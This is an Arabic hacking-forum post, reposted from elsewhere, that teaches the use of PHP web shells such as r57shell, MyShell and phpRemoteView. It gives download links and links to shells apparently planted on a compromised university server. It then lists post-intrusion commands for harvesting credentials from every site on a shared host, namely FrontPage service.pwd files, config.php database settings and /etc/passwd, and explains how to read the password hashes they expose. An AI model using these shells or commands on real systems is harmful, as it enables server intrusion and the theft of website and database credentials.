Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ليوم موضوعنا سهل مره وهو عن الشل وأوامره


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
ليوم موضوعنا سهل مره وهو عن الشل وأوامره
Permalink   
 





بسم الله الرحمن الرحيم


اليوم موضوعنا سهل مره وهو عن الشل وأوامره

وهذا شيء ضروري معرفته وأتوقع إن أكثركم

يعرف الشل وأوامره لكن وضعته لطلب الكثير من الأعضاء .

000

في هذا الموضوع راح أتكلم عن أفضل وأسهل سكربتات الشل

وكل شل معه الرابط لتحميله والشلات اللي أنصحكم فيها

وضعت لكم مثال عليها على سيرفر مخترق .


webadmin



شل جميل جداً وما يحتاج أوامر لينكس وسهل جداً جداً

ومن خصائصه :

رفع ملفات بسهوله

إنشاء مجلدات بسهوله

لتطبيق أمر معين على أحد الملفات كل ماعليك فعله هو الضغط على المكان الفارغ أمامه

وسوف تظهر لك قائمه بكل ماتريد عمله من حذف وتعديل وتحميل وغيره

وأيضاً تستطيع حذف مجلد بكل محتوياته بضغطة زر .


رابط التحميل :

webadmin.zip

رابط الشل على السيرفر :

http://web.skku.edu/~hakmu/zb41pl4/...de/webadmin.php



Myshell



شل جميل جداً ويعتمد على أوامر لينكس


من خصائصه :


معرفة صلاحيتك بجانب الجملة Current User

ومعرفة أين موقعك على السيرفر وأقصد بأي مجلد

معرفة كل المجلدات الموجودة في المجلد الذي تتصفحه

رابط التحميل :


MyShell-1.0.6.zip

رابط الشل على السيرفر :

http://web.skku.edu/~hakmu/zb41pl4/...Shell-1.0.6.php


phpRemoteView

شل جميل جداً وخصائصه كثيره جداً

وبعض خصائصه مشابهه لخصائص webadmin

وللتعديل على الملفات إستخدم الأسهم المقابله لأسمائها


رابط التحميل :


phpRemoteView.zip

رابط الشل على السيرفر :

http://web.skku.edu/~hakmu/zb41pl4/...pRemoteView.php


phpshell-1.7



شل جميل وشبيه بالشل Myshell

رابط التحميل :


phpShell-1.7.zip


رابط الشل على السيرفر:

http://web.skku.edu/~hakmu/zb41pl4/...de/phpshell.php


phpFileManager



شل رائع جداً وسهل وأوامره واضحه جداً

رابط التحميل :


phpFileManager.zip

رابط الشل على السيرفر :

http://web.skku.edu/~hakmu/zb41pl4/...pcode/index.php


r57shell


الشل الرائع جداً والغني عن التعريف وهو الإصدار الأخير

شل سهل جداً وخصائصه كثيرة جداً

ومنها أوامر البحث عن ملفات مثل config.php جاهزة وأيضاً أمر سحب

الملفات wget جاهز وغيره الكثير .


رابط التحميل :


R57Shell.zip

رابط الشل على السيرفر :

http://web.skku.edu/~hakmu/zb41pl4/...de/r57shell.php


phplab

شل جميل لكن غير عملي ولا أنصح المبتدئين به


رابط التحميل :


phpLab.zip



haexplorer

شل جميل لكن غير عملي ولا أنصح المبتدئين به

رابط التحميل :


haexplorer.zip




php exploit lab

شل جميل لكن غير عملي ولا أنصح المبتدئين به

رابط التحميل :


php exploit lab.zip




كيف تستخدم الشل + أوامر اللينكس التي تهمك في الإختراق


سيتم التطبيق على الشل Myshell لسهولته ولكثرة إستخدامه


الصورة :



1- مكان وضع أوامر اللينكس

2- بعد وضع أوامر اللينكس تضغط عليه لكي يتم التطبيق

3- صلاحياتك

4- موقعك على السيرفر


5- المجلدات الموجودة بالمكان الذي تتصفحه

الأوامر التي تهمك في الإختراق


الأمر


cat /home/*/public_html/_vti_pvt/service.pwd


أمر جلب باسوردات المواقع التي تستخدم الفرونت بيج


الامر


cat /home/*/public_html/_vti_pvt/access.cnf


أمر معرفة أسامي المواقع التي تستخدم الفرونت بيج


الأمر


cat /home/*/public_html/*/admin/config.php

cat /home/*/public_html/*/admincp/config.php


أمر عرض ملفات الــ config.php للبرامج المثبته على المواقع مثل


المنتديات والمجلات وغيرها ممن تستخدم ملفات الــ config


أمر


cat /etc/domainalias


عرض المواقع مع أسامي المستخدمين


أمر


find / -name config.php


البحث عن جميع الملفات التي إسمها config.php

وستطيع البحث في هذا الأمر عن أي ملف تريد


أمر


cat /etc/passwd


يظهر جميع باسوردات المواقع التي على السيرفر

وإذا كان اللي ظهر لك بالطريقه هذي

carlos:vmYQDR1pWRVLE

معناها ان carlos إسم الموقع

وإن vmYQDR1pWRVLE هو الباسورد المشفر

أما إن طلع لك بالطريقه هذي

carlos:x

فمعنى الــ x ان الباسورد مخفي وما تقدر تشوفه

الأن شرح للأوامر التي ذكرناها

cat /home/*/public_html/*/admin/config.php


cat أمر عرض ملفات دفعه واحده


home المجلد الذي يوضع فيه المواقع


* مكان إسم الموقع واستبدلناه بالنجمه حتى يظهر لنا الجميع


public_html المجلد الرئيسي الذي يوضع فيه ملفات المواقع


* إسم المجلد الذي يوضع فيه البرامج مثل المنتديات والمجلدات وغيرها

واستبدلناه بالنجمة حتى يظهر الجميع


admin إسم مجلد لوحة التحكم

config.php الملف الذي يوضع فيه بيانات قاعدة البيانات

وباقي الأوامر شرحها شبيه بالشرح هذا

مع العلم أن أسامي المجلدات من الممكن أن تكون مختلفه أو أن يتم تغييرها

بس انتهى

kakarotto

منقول للافادة
__________________



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard